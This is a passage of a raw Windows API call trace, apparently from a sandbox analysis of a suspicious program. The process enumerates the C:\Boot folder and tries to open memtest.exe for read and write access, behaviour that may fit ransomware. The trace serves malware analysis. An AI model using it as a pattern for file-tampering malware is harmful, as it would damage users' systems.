lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.847] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c78 [0187.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0187.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bd8 | out: hHeap=0x620000) returned 1 [0187.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c28 | out: hHeap=0x620000) returned 1 [0187.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0187.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.850] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0187.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.851] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cc8 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0187.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c00 | out: hHeap=0x620000) returned 1 [0187.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0187.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c78 | out: hHeap=0x620000) returned 1 [0187.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ca0 | out: hHeap=0x620000) returned 1 [0187.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0187.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0187.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.855] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0187.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.855] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x6ec2e0 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c78 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0187.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83890 [0187.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c28 | out: hHeap=0x620000) returned 1 [0187.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bd8 | out: hHeap=0x620000) returned 1 [0187.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cc8 | out: hHeap=0x620000) returned 1 [0187.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0187.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0187.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ca0 | out: hHeap=0x620000) returned 1 [0187.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0187.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.860] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0187.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.861] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0187.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.861] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.862] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.863] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0187.863] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.865] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x2e912b0 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cc8 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83868 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0187.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bb0 [0187.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c78 | out: hHeap=0x620000) returned 1 [0187.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0187.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c00 | out: hHeap=0x620000) returned 1 [0187.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0187.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0187.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0187.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0187.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0187.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83890 | out: hHeap=0x620000) returned 1 [0187.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ca0 | out: hHeap=0x620000) returned 1 [0187.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ec2e0 | out: hHeap=0x620000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.871] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.872] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.872] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0187.872] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83890 [0187.872] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0187.872] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x2d08630 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c78 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b88 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ed0 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ea8 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e80 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e58 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e30 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e08 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83de0 [0187.873] 